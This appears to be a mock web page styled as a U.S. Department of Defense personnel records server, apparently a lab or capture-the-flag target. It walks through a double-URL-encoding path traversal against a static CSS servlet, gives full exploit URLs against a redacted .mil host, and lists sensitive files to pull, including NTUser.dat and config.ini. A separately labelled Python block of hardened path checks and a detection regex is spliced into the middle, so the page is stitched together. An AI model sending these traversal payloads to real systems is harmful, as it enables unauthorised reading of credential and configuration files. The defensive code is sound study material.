U.S. Department of Defense — DoD Personnel Records System — Authorized Access Only
DoD Personnel Records System · GWT 2.8.2 · Apache Tomcat 8.5.38
Windows Server 2008 R2 IIS 7.5 Java 8u201
GWT Static Resource Servlet — GwtCssServlet /gwtmain/*
Servlet Endpoint
// Normal CSS resource request
https://████.mil/gwtmain//module_styles.css  ← 200 text/css

// Double URL encoding bypasses path filter
// Encode: ../ → ..%2f → ..%252f (encode the % again)
https://████.mil/gwtmain//..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fwindows/System32/drivers/etc/hosts
How Double URL Encoding Bypasses the Filter

Stage               Value     What happens
Attacker sends      ..%252f   % encoded as %25; slash still hidden
Server decode #1    ..%2f     %25 → %; no literal ../ — PASSES FILTER
Servlet decode #2   ../       urldecode() %2f → /; TRAVERSAL ACTIVE
https://████.mil/128.php?path=inetpub/wwwroot/gwtmain/module_styles.css
Filter blocks: ../ (literal)  ·  Try double-encoded: ..%252f..%252f..%252fwindows/System32/drivers/etc/hosts
Note: Browser address bar auto-decodes — use Burp Suite or the field above for raw %25 sequences.
Server Status
OS      Windows Server 2008 R2
IIS     7.5.7600
Java    1.8.0_201
Tomcat  8.5.38
GWT     2.8.2
Status  Running
Auth    Windows Auth
Loaded GWT Modules
gwtmain personnel records reports gwt-user
CSS served from: C:\inetpub\wwwroot\gwtmain\
About GwtCssServlet
The GwtCssServlet serves static CSS resources for GWT modules. It maps URL paths to files on disk. The servlet applies urldecode() internally — creating a second URL decode pass when combined with the web server's decode.
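The decode mismatch described above and in the stage table, as an added Python illustration (not the GwtCssServlet's own code): the weak single-decode check beside a hardened resolver that decodes to a fixed point and enforces containment under the web root, plus a log-side detector for %25xx sequences. WEB_ROOT, PAYLOAD and the function names are assumptions.

```python
"""Naive vs hardened path handling for a static-resource servlet.
Illustrative Python, not the GwtCssServlet's own code."""
import posixpath
import re
from urllib.parse import unquote

# Page states CSS is served from C:\inetpub\wwwroot\gwtmain\; the drive
# letter is dropped here so posixpath can normalise the path.
WEB_ROOT = "/inetpub/wwwroot/gwtmain"

# Constructed request, mirroring the page's double-encoded traversal.
PAYLOAD = "..%252f" * 16 + "windows/System32/drivers/etc/hosts"

# Detection: '%25' followed by two hex digits is a double-encoded byte.
DOUBLE_ENCODED = re.compile(r"%25[0-9a-f]{2}", re.IGNORECASE)

def is_double_encoded(request_path: str) -> bool:
    return DOUBLE_ENCODED.search(request_path) is not None

def naive_filter_allows(request_path: str) -> bool:
    """Decode once, then look for a literal '../' (the weak check)."""
    once = unquote(request_path)              # decode #1: %25 -> %
    return "../" not in once and "..\\" not in once

def servlet_resolves(request_path: str) -> str:
    """Second decode inside the servlet, mapped onto the disk root."""
    twice = unquote(unquote(request_path))    # decode #2: %2f -> /
    return posixpath.normpath(WEB_ROOT + "/" + twice.replace("\\", "/"))

def hardened_resolve(request_path: str, max_rounds: int = 3):
    """Decode until stable (bounded), normalise, then require the result
    to stay under WEB_ROOT. Returns the path, or None to reject."""
    decoded = request_path
    for _ in range(max_rounds):
        nxt = unquote(decoded)
        if nxt == decoded:
            break
        decoded = nxt
    else:
        return None                           # still changing: reject
    if "\x00" in decoded:
        return None                           # NUL byte: reject
    decoded = decoded.replace("\\", "/").lstrip("/")
    resolved = posixpath.normpath(WEB_ROOT + "/" + decoded)
    if resolved != WEB_ROOT and not resolved.startswith(WEB_ROOT + "/"):
        return None                           # escaped the root: reject
    return resolved
```

The naive check passes the constructed payload while the servlet's second decode resolves it outside the root; the hardened resolver rejects single- and double-encoded forms alike, and is_double_encoded flags the request for the access-log side.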
Known Files (Windows)
windows/System32/drivers/etc/hosts
windows/System32/drivers/etc/services
Users/Administrator/NTUser.dat
inetpub/wwwroot/WEB-INF/web.xml
ProgramData/dod_app/config.ini